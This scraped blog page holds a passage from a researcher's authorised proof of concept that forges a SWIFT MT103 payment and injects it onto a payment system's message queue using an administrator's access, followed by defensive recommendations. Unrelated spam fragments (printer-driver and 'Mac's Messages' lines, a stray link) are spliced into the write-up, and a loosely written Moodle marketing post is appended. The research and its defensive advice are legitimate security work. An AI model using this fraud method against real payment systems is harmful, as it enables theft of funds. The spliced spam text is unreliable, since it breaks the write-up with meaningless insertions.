But LAU aside, I now just needed to figure out which queue to target! There were a lot of queues to work with as each system essentially has multiple “input” and “output” queues. With that in mind, it was important to note that: an incoming message would require being in the format expected by the target system (from a specific upstream system) and an outgoing message would need to be in the format “produced” by one target system and “expected / ingested / processed” by its respective downstream system. So to figure this out, I worked backwards from the Gateway.
Targeting SAG
This was the least feasible attack vector!
I hadn't really looked into how the SWIFT adapters worked - If only I could research literally everything);
SAA and SAG implemented LAU on messages sent between them - An excellent security control!;
The output of SAG was directly on to SWIFTNet which would entail all sorts of other complications - this is an understatement)!
Next!
Targeting SAA
So what if I wanted to drop a message on the “outbound” channel of SAA?
LAU and the SWIFT adapter aside, remember those session and sequence numbers? Well, messages which leave SAA are in the near-final stages of their outbound life-cycle, and as far as I understood would need to have valid session and sequence values. Given I didn't know how to generate these values without gaining access to SAA or how they worked in general (and lets not forget the LAU signing) this didn't currently seem feasible.
Next!
Targeting SANCT
This solution didn't actually transport messages back and forth; it just reads messages off the queues and performed checks on their details. Not much I could wanted to leverage here.
Targeting MID
To target MID, I could try and inject a message onto SAA’s “input” queue, or the “output” queue of MID. This would only need to match the format of messages produced by the Middleware solution (MID). Following this, in theory, the (mistial) message session and sequence number would be added by SAA, along with the UETR. This was promising!
However, MID was a SWIFT “message partner”, which are typically solutions developed using the Alliance Access Development Kit that allows vendors to develop SWIFTNet compatible software, and consequentially, implement LAU. So again, in-order to forge a message here, I’d need to compromise the left and right LAU signing keys used between SAA and MID, manually HMAC the message (correctly!), and then place it on the correct queue.. This also no longer looked promising..
Targeting SYS
OK, how about the input of the next system down - the 'Payment System'?
5m Mathmrs. Mac's Messages To My
As described previously, the inbound data was a custom “application specific” payment instruction from the institutions back office systems, and not a SWIFT MT message. This would be an entirely new core concept I'd need to reverse - not ideal for this project.
But how about the output queue?
Although SYS received custom format data, I found that it output what seemed to be an initial SWIFT MT messages. This was perfect! Additionally, SYS did not have LAU between itself and MID because (unlike MID) SYS was not a SWIFT message partner, and was just one of many-many systems within the institution that formed their overall payment landscape.
Additionally, because SYS was esentially just one small piece of a much larger back office architecture, it was not part of the SWIFT Secure Zone (after all you cant have your entire estate in the Secure Zone - that defeats the purpose) and as such, made use of the Queue Manager within a more accessible section of the general corporate environment (QM1). Konica minolta bizhub c352 driver mac os xcompubrown recovery tool.
With this in mind, and having - in theory - compromised the MQ admin, I could leverage their access to access on the corporate network to authenticate to QM1. I could - in theory - then write a fraudulent payment message to the SYS “output” queue, which we will call “SYS_PAY_OUT_Q” from here on.
OK! It seems like I finally had an idea of what to do! But before I could put it into practice, I of course needed to create a diagram of the attack:
I think it’s important to take a minute to refer back to the concept of “trust” which is what lead to this attack diagram. My theory behind why this may work is because the MID application, implicitly trusts whatever it receives from its respective upstream systems. This is intentional, as by design the security model of the payment landscape ensures that: at any point a message can be created, a 4 (or 6) eye check is performed. If there was a system whose purpose it was to ensure the validity of a payment message at any point upstream, the downstream systems should have no real issue processing that message (with some exceptions). After all, It would be next to-impossible to maintain a high-throughput payment system without this design.
And with that said, the plan was now clear:
Leverage the access of a Message Queue administrator;
to abuse the “trust relationship” between SYS, MID, and SAA;
to introduce a fraudulent payment message directly on to the output queue of SYS;
by leaning on my new found understanding of complete MT103 payment messages.
It was finally time to try to demonstrate a Proof-of-Concept attack!
So at this point I believe I had everything I needed in order to execute the attack:
The target system!
The message format!
The queue manager!
The queue!
The access requirements!
The generously granted access to a fully functional SWIFT messaging architecture! (that’s a good one to have!)
The extra-generously granted support of various SMEs from the target institution! (This was even better to have!)
Message Forgery
I needed to begin by creating a valid payment message using valid details from the target institution. So before moving on I was provided with the following (Note: as with many things in this post, these details have been faked):
Debtor Account Details – John Doe, GB12EBNK88227712345678 at EBNKGB20
Creditor Account Details – Alice Smith, GB15EBNK88332287654321 at EBNKGB20
Some of you may have notice that the sending and receiving BIC’s are the same. This was because, for the sake of the research, I wanted to send the message back to the target institution via SWIFTNet so that I could analyse its full end-to-end message history. Furthermore, you may have noticed we are using 'test & training' BIC code (where the 8th character is a 0) - this was to make sure, you know, that I kept my job.
But yes, with access to these 'valid' account details and the knowledge gained during the research so far, I could now forge a complete Input MT103 messages:
Note: Field 33B is actually an optional field, however, the MT standard stated that “If the country codes of both the Sender’s and the Receiver’s BIC belong to the country code list, then field 33B is mandatory”. As such, if 33B was not present in the message, it would fail network validation rules and SWIFTNet would return a NAK with the error code: D49.
Optional / Mandatory fields aside, it was not quite that simple! There were a few minor changes I needed to make based on the specific point in the message's its life-cycle I was planning to introduce it!
As I list these changes, remember that the objective is to introduce the message to the output queue of SYS (Which exists before MID, SAA and SAG)
The first 3 blocks needed to be placed on a single line;
Remove field 121 (UETR) from the User Header, as this would be generated by SAA during processing;
Remove 1 character from the transaction reference as it needed to be exactly 16 characters (classic user error);
Add decimal point to transaction amount using a comma - otherwise it would fail syntax validation rules;
Ensure the IBAN's were real and accurate, otherwise it seemed the message would fail some type of signature validation on the SWIFT network. The IBANs are fake here, but during the real PoC we used accurate account details in collaboration with the target institution;
Remove the trailer block (5) - as this would be appended by SAA during processing;
Remove the System Block (S) - as this would be completed by the SAG.
And the final message was as follows:
Note that the location in which I introduce the message has resolved all of the 'issues / blockers' I'd tracked whilst researching the message structure! It would seem the further upstream you go, the easier the attack becomes - given MQ is still used as a transport medium.
Message Injection
Now I had my raw MT103 message, I just need to save it to a file (“Message.txt” - sure why not) and place onto the “SYS_PAY_OUT_Q” queue using one of the admin's tools:
With access to a sole MQ Administrator's AD account;
We connect to the MQ admins machine;
Log into the Jump Server;
Open our MQ tools of choice and authenticate to queue manager (QM1) where the output queue for SYS was managed;
Connected to the 'SYS_PAY_OUT_Q' queue;
Selected my forged “Message.txt” file;
Invoked the “write to queue” function;
And it was off!
Loggin in to Alliance Access and opening the message history tab, we sat awaiting for an update. Waiting, waiting, waiting… waiting… and..
ACK! It worked!
That's a joke; did we hell receive an ACK!
See, this last section is written slightly more 'linear' than what actually happened. Remember those 'tweaks' used to fix the message in the previous section? I hadn't quite figured that out yet..
So roughly seven NACKs later - each time troubleshooting and then fixing a different issues - we did indeed, see an ACK! The message was successfully processed by all systems, passed target system validation rules, passed sanctions and AML screening, passed SWIFTNet validation rules, and SWIFT’s regional processor had received the message and sent an 'Acknowledgement of receipt' response to the sending institution!

For the sake of completeness, I’ve included the ACK below:
And of course a breakdown of what it all means:
NameValueContextBasic Header Flag1Block 1Application TypeFF = FIN ApplicationMessage Type2121 = ACKInstitution CodeEBNKGB20AXXXEBNKGB20 (BIC) A (Logical Terminal) XXX (Branch)Sequence and Session No.19473923441947 (Sequence No.) 392344 (Session No.)Date Tag177200103 (Date) 1102 (Time)Accept / Reject Tag4510 = Accepted by SWIFTNet
Excellent! WooHoo! It worked! .. That took a lot of time and effort!
Closer Inspection
But the ACK wasn't enough, I wanted to make sure I understood what had happened to the message throughout its life-cycle. From the message I placed on the initial queue, to being processed by SWIFTNet.
Thankfully, as we sent the message back to the target institution we could see its entire message history. I already knew what the raw message placed on the queue looked like, so I wanted to focus on what became of the message once it had been processed by SAA:
The end-to-end tracking UUID had been generated and added (b42857ce-3931-49bf-ba34-16dd7a0c929f) in block 3;
The message trailer had been added ((5:(TNG:))) where I could see that - due to the BIC code used - SAA had flagged the message as 'test and training'.
Additionally, an initial System Block segment had been added ((S:(SPD:))), tagging the message as a possible duplicate. I wonder why - *cough* 7th attempt *cough*?
OK, so that was SAA. Now let’s see how it looked it once it passed through the Gateway and regional processor:
OK, we can see a few changes now.
The session and sequence numbers have been populated (1947392344);
The I/O identifier in block 2 has been updated to track that it is now an 'Output' message;
The additional data within Block 2 is a combination of the input time, date, BIC, session and sequence numbers, output date/time, and priority;
The trailer has been updated with a message authentication code (MAC) calculated based on the entire contents of the message using a pre-shared key and a secret algorithm;
Additionally, a checksum of the message body has been stored within the trailer’s “CHK” tag. This is used by the network to ensure message integrity.
I also took a look at the entire outbound message history, just to see all the “Success” and “No violation” statements to make it feel even more awesome!
So that's that really..
With a bit of research and support I was able to demonstrate a PoC for introducing a fraudulent payment message to move funds from one account to another, by manually forging a raw SWIFT MT103 single customer credit transfer message, and leveraging various system trust relationships to do a lot of the hard work for me! https://arfox158.tumblr.com/post/655263262721638400/wireless-external-hard-drive-for-mac.
As mentioned briefly in the introduction, this is not something I have really seen or heard of happening in practice or in the 'wild'. Perhaps because it clearly takes a lot of work.. and there is a huge margin for error. However, if an adversary has spent enough time inside your network and has had access to the right documentation and resources, this may be a viable attack vector. It definitely has its benefits:
No need to compromise multiple payment operators;
No requirement to compromise - or establish a foothold within - the SWIFT Secure Zone;
No requirement to bypass MFA and gain credentials for a messaging interface;
No generation of application user activity logs;
No payment application login alerts;
No bespoke app-specific and tailored malware;
And all the other things associated with the complex task of gaining and leveraging payment operator access.
All an attacker may need to do is compromise one specific user on the corporate network: a Message Queue administrator.
The industry is spending a lot of time and effort focused on securing their payment systems, applications, processes, and users to keep - among other things - payment operators safe, Messaging Interfaces locked down, and SWIFT systems isolated. But the reality is,; the most valuable and most powerful individual in the entire model, might just be a single administrator!
As always, a security model is only as strong as its weakest link. If you're not applying the same level of security to your wider institution, there may very well be many weak links within the wider network which chain together and lead to the comrpomise of systems which feed into your various payment environment.
I think the main thing to remember when reflecting on this research is that it did not abuse any vulnerabilities within the target institution's systems, or even vulnerabilities or weaknesses within the design of their architecture. It simply leverages the legitimate user access of the Message Queue administrators and the trust relationships that exist by design within these types of large-scale payment processing systems.
So the harsh reality is, there is no particular list of recommendations for preventing this type of attack in itself. However, the main point to drive home is that you must ensure the security of your users - and overall organisation - is of a high enough standard to protect your highest privileged users from being compromised. Things such as:
Strong monitoring and alerting controls for anomalous behaviour;
Requirements for Multi-Factor authentication for access to critical infrastructure;
Segregation of critical infrastructure from the wider general IT network;
Strong password policies;
Well rehearsed incident detection and incident response policies and procedures;
Frequent high-quality security awareness training of staff;
Secure Software Development training for your developers;
Routine technical security assessments of all critical systems and components;
The use of 3rd party software from reputable and trusted vendors;
However, in the context of Message Queues, there is one particular control which I think is extremely valuable: The implementation of channel specific message signing! This, as demonstrated by SWIFT's LAU control, is a good way in which to ensure the authenticity of a message.
As discussed, LAU is - as far as I know at the time of writing - a SWIFT product / message partner specific control. However it's concept is universal and could be implemented in many forms, two of which are:
Update your in-house application's to support message signing, natively;
Develop a middleware component which performs message signing on each system, locally.
This is a complex requirement as it requires considerable effort on the client’s behalf to implement either approach. However, SWIFT provides guidance within their Alliance Access Developers guide on how to implement LAU in Java, Objective C, Scala and Swift;
Strip any S block from the FIN message input. Keep only blocks 1: through 5;
Use the FIN message input as a binary value (unsigned char in C language, byte in Java). The FIN message input must be coded in the ASCII character set;
Combine the left LAU key and the right LAU key as one string. The merged LAU key must be used as a binary value (unsigned char in C language, byte in Java). The merged LAU key must be coded in the ASCII character set;
Call a HMAC256 routine to compute the hash value. The hash value must also be treated as a binary value (unsigned char in C language, byte in Java). The HMAC size is 32 bytes;
Convert the HMAC binary values to uppercase hexadecimal printable characters.
An example of how this may work in the more flexible middleware solution proposed is where the original service is no longer exposed to the network, and is altered to only communicate directly with the custom 'LAU-eqsue' service on its local host. This service would then sign and route the message to its respective queue.
When received, the core of the recipient payment service would seek to retrieve its messages from the queues via the 'LAU-esque' signing middleware, which would retrieve the message and subsequently verify its origin and authenticity by re-calculating the signature using their shared (secret) keys. Key-pairs could further be unique per message flow. This design could allow for the signing to be used as a way to validate the origin of a message even if it had passed through multiple (local) intermediary systems.
As a final bit of creative effort, I made yet another diagram to represent what this could perhaps look like - if life was as easy as a diagram:
If you made it this far thanks for reading all.. ~6k words!? I hope you found some of them interesting and maybe learned a thing or two!
I'd like express our gratitude to the institution who facilitated this research, as well as specifically to the various SMEs within that institution who gave their valuable time to support it throughout.
Fineksus - SWIFT Standard Changes 2019
https://fineksus.com/swift-mt-standard-changes-2019/
Paiementor - SWIFT MT Message Structure Blocks 1 to 5
https://www.paiementor.com/swift-mt-message-structure-blocks-1-to-5/
SEPA for corporates - The Difference between a SWIFT ACK and SWIFT NACK
https://www.sepaforcorporates.com/swift-for-corporates/quick-guide-swift-mt101-format/
SEPA for corporates - Explained: SWIFT gpi UETR – Unique End-to-End Transaction Reference
https://www.sepaforcorporates.com/swift-for-corporates/explained-swift-gpi-uetr-unique-end-to-end-transaction-reference/
M DIBA - LAU for SWIFT Message Partners
https://www.linkedin.com/pulse/lau-swift-message-partners-mohammad-diba-1/
Prowide - About SWIFT
https://www.prowidesoftware.com/about-SWIFT.jsp
5m Mathmrs. Mac's Messages For Her
Microsoft - SWIFT Schemas
https://docs.microsoft.com/en-us/biztalk/adapters-and-accelerators/accelerator-swift/swift-schemas
SWIFT FIN Guru - SWIFT message block structure
http://www.swiftfinguru.com/2017/02/swift-message-block-structure.html

2 notes
·
View notes
Text
10 Common Myths About Moodle Development Consulting.
Moodle is the most widely used learning management system Moodle is one of the most flexible learning management systems. It has the largest number of active users and developers, thanks to its adaptability and extensive feature set. The worldwide user base is estimated to be over 68 million. There are currently 46,507 registered sites in 241 countries (Moodle.net).
Moodle is an open-source course management system Moodle is an incredibly successful open source project and has thousands of regular community contributors who continue to push its core functionality. Even with its high-end feature set, Moodle is completely free!
The largest number of Moodle registrations come from the United States With 7,061 registrations, the United States has the highest number of registrations for Moodle LMS in the world. The top 10 countries with 5,375 registrations were Spain, Brazil (3,240), the United Kingdom (2,527), Mexico (1,911), Germany (1,596), Colombia (1,394), Italy (1,368), Australia, (1,153) and the Russian Federation ( 1,130).
Moodle stands for Modular Object-Oriented Learning Environment. The openly shared, open-source platform is known as Moodle really stands for Modular Object-Oriented Learning Environment, which describes how it got its uncommon-sounding title. Moodle is also a verb that indicates to simply drive through something, doing things as they occur to you, a pleasurable tinkering method that points to creativity and penetration. It may speak to how Moodle was actually formed.
Hire a Moodle development company
Moodle is surprisingly easy to use Despite its complicated-sounding name, Moodle software is relatively easy to use. The installation process is a bit technical, but once you’re up and running, you really need to have basic web browsing skills to take advantage of this LMS.
There are hundreds of Moodle plugins The functionality of the Moodle program can be advanced with the advantage of plugins, of which there are over 1,000. All plugins are supported in the Moodle Plugins list.
Change the look and feel of a Moodle site by installing graphical themes Want to customize the functionality of your Moodle site? Engrossed in improving the appearance and quality of a course? By taking advantage of Moodle themes, which can be downloaded directly from the Moodle download site, you can easily change the visual aspect of your courses.
Moodle can be used on mobile devices The mobile user support is exploding right now, so it’s satisfying to acknowledge that some Moodle themes are mobile-friendly and use responsive web design. The Moodle portable app can also be downloaded on most portable projects.
Moodle can run on a variety of systems Any system that supports PHP and databases can run Moodle, including Unix, Linux, Windows, Mac OS X, NetWare, FreeBSD, and even most web host providers.
Moodle Moodle is open-source software using a “freemium” payment model, which means you get the basics for free but have to pay for additional options. According to recent surveys, it is one of the most popular LMS, mostly used by institutions with between 1,000 and 2,000 full-time students.
One of the main disadvantages of this system is that it is very difficult to install and fix. There are many companies that can help with setting up and customizing the system, but their services are quite expensive. Moodle is perfectly suited for general educational goals, but to implement it, a company must have at least one qualified IT specialist, as well as a separate server and hardware. Moodle is already free, but the additional cost can be $10,000/year, not including IT department salaries.
Key Features of Moodle:
grade management Student Roster / Attendance Management evaluation implementation Discussion Forum lesson planner collaboration management, Moodle Consultent file exchange Internal Messaging, Live Chat, Wiki
Moodle provides specialized modules to create courses (Moodle Rooms) that can be used in situ or migrated to another LMS. The main problem with this system is that it requires additional time and effort to adapt and implement — up to 18–24 months. If you can allow such time-consuming projects without any harm to your company, then Moodle is an excellent solution for your business.
Blackboard Blackboard is an industry-leading LMS, which is comprehensive and flexible, but expensive. Detailed pricing information is not publicly available, but the cost depends on how many licenses you need. It already has a lot of schools and is considered a great value for money, especially for large institutions with lots of resources.
Blackboard Excellence in Curriculum Creation; A trainer can upload and manage all the materials he needs. However, if an additional practice or implementation assistance is required, it can be difficult to discover and hire a qualified blackboard professional.
Key Features of Blackboard:
Custom branding, fields, and functionality test engine Multiple Delivery Formats administrative reporting course catalog Data Import/Export grading individual plans student portal goal setting skill tracking The system lacks collaboration features and doesn’t excel at email integration, but offers self-paced instruction methods and resource management.
Conclusion
The Moodle platform is a great learning platform for teachers. Its flexibility and feature set allows for extensive customization and effective curriculum development. Its experience, as you just found out, is also kind of engaging. If you want a free Moodle instance, you can visit Moodle’s new cloud service, https://moodlecloud.com/en/.
If you want to take Moodle even further with the many plugins and themes contact creators to see how far you can go.
What is your moodle dream? The reason I keep discovering is that “we want to base our online engagement with a marketing company that has an antiquity and is expected to take our futures on a public shareware type product.”
What people fail to realize is that Moodle is in every way as commercial a product as Blackboard. This is accomplished by creating certified “Moodle Partners”. These partners provide all of the same services and assistance Blackboard provides to its customers through commercial agreements enforceable by law. The big difference, however, is that you don’t have to pay for a Moodle license so that the $100,000 budget Jack is talking about becomes 100% training, support, and customization. What we strive for the future of our company is that the money from eliminating the license fee can be used for additional faculty training, which we will be happy to deliver. This brings up some other benefits of Moodle that may or may not fit the Mythbuster documentation, but here is what they’re worth: Pros for Moodle 1) If you want to do something that hasn’t been done before, you can create a new module yourself. 2) License You must share your module with the Moodle community for free. A huge library of modules is already built like this. 3) If you don’t like the service or solution you get from the Moodle partner you are working with, you can simply buy from a different Moodle partner. Cons for Blackboard 1) Blackboard has its own roadmap that may or may not include the feature you were hoping for. 2) Blackboard does provide building blocks, but they are mostly commercially licensed whereas the Moodle modules are all free under the Moodle open source license. 3) If you don’t like the service or solution you get from Blackboard, there’s nothing you can do about it other than switch to WebCT (oh, wait, you can’t do that now!).
1 note
·
View note